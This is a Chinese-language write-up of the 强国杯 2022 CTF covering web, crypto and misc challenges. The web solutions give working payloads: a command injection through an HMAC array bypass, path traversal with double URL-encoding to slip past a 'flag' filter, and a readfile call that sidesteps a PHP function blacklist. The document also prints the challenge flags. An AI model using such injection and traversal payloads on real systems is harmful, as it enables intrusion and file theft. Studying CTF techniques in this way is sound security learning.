强国杯 2022 分区赛 Writeup
4 min read
Web
Execute command
打开环境发现 It works! 外加 Apache 2.2.49 ,感觉是 CVE-2021-41773
web_Huluwa
在 huluwa.mp3 中得到题目源码
if(empty($_POST['Huluxiaojinggang']) || empty($_POST['Shejing'])){
die('看我四娃喷火!看我五娃喷水!');
}
$secret = getenv("secret");
if(isset($_POST['yeye']))
$secret = hash_hmac('sha256', $_POST['yeye'], $secret);
$qwer = hash_hmac('sha256', $_POST['Shejing'], $secret);
if($qwer !== $_POST['Huluxiaojinggang']){
die('看我大娃 正蹬,鞭腿,刺拳,训练有素。');
}
echo exec("nc".$_POST['Shejing']);Shejing 最后和 nc 拼接当做命令执行,Huluxiaojinggang 必须和 Shejing 编码后的值一样, 而 yeye 我们直接 数组 绕过即可,直接根据代码逻辑生成 Huluxiaojinggang 的值
<?php
$a = "|cat flag.php";
var_dump(hash_hmac("sha256", $a, getenv("secret")));
// 342497a893ba4ea1b31fec268ee3a35539635831e08c2164327b328e26dbef44yeye[]&Shejing=|cat flag.php&Huluxiaojinggang=342497a893ba4ea1b31fec268ee3a35539635831e08c2164327b328e26dbef44ikun
访问环境,查看源码发现很明显是文件读取
发现会在提交的内容后面拼接 .jpeg 后缀
经过测试发现可以使用 ? 进行截断绕过
一番测试发现 flag 位置和名称
/file?image=../../../../../?
尝试包含发现好像会过滤 flag 字符
我们直接两次 url编码 绕过
/file?image=../../../../../%25%36%36%25%36%63%25%36%31%25%36%37%25%35%66%25%33%38%25%33%35%25%33%31%25%33%35%25%36%36%25%33%32%25%33%31%25%33%31%25%33%32%25%33%32%25%33%32%25%33%30?
guomi
打开环境发现请求头里出现了提示,不之所以(被迷惑了一天,最后发现密码是 123123
Hint: select * from 'admin' where password=guomi($pass,true)登录后跳转到了 guomi.php ,查看源代码发现 func 和 p
随便构成传递一下,通过报错信息发现使用的 call_user_func
一番操作发现所有的常见的命令执行函数全被禁用,后来想了一下,执行不行,读取应该可以,所以直接使用 readfile 成功读取到 guomi.phpp 的源码
/guomi.php?func=readfile&p=guomi.php<?php
$disable_fun = array("file_get_contents","exec","shell_exec","system","ls","passthru","proc_open","cat /tmp/flagqlklg","tac /tmp/flagqlklg","more /tmp/flagqlklg","less /tmp/flagqlklg","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
if (!in_array($p,$disable_fun)){
echo gettime($func,$p);
}else{
die("you are Hacker....");
}
#echo gettime($func, $p);
}else {
die("you are Hacker...");
}
}
?>$disable_fun 正好写了 flag的位置,我们直接读取 flag
/guomi.php?func=readfile&p=/tmp/flagqlklgCrypto
神秘的二进制
直接 2进制 转 16进制 然后再转成 字符串 ,得到的字符串感觉像是 base64 但解密未果,最后发现是换表了
import base64
str1 = '1100110100010101010000001011110011001101010110010011000100101100110100010101100011001101011001011100010110100001110110010000010011010101010101001100110101001000110010010101010101100001010001011100010101011000110111010010000011010001000110001011110100011101110010010001100100001101010111001101110110101101111010010101000011001101010010011011010101100000110110011110000011011101000011001100100011000101010011'
str2 = bytes.fromhex(hex(int(str1, 2))[2:]).decode('utf-8')
# 3EP/3VLK4V3YqhvA5U3R2UXQqV7H4F/GrFCW7kzT3RmX6x7C21S
t = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
l = ""
for i in str2:
l += t[(t.index(i)-30)%64]
if len(l)%4!=0:
l = l+"="*(4-(len(l)%4))
print(base64.b64decode(l).decode('utf-8'))
# flag{lkvz04bofscnr3wijxh6y8teug29q7da}Misc
好多图图
docx 后缀改为 zip,解压后在 word/theme 目录发现 1-30.png 在第 22 张中发现flag
编码的乐趣
直接 与佛论禅 -> 社会主义核心价值观 -> md5
Listen to the audio
通过在线网站得到图片中隐藏的密码 Gnfjj@g94
但是解密不对,根据提示说是 栅栏解密栏数为5 ,最后试出是 W型栅栏 ,得到最终密码 Gfjg49@jn,直接使用 MP3Stego 解密即可
.\Decode.exe -X .\1.mp3 -P 'Gfjg49@jn'
找到什么了?
.\Decode.exe -X .\2.mp3 -P 'Gfjg49@jn'
flag{atnmjkrobu840mghcnr3imtn4mf8rv8g}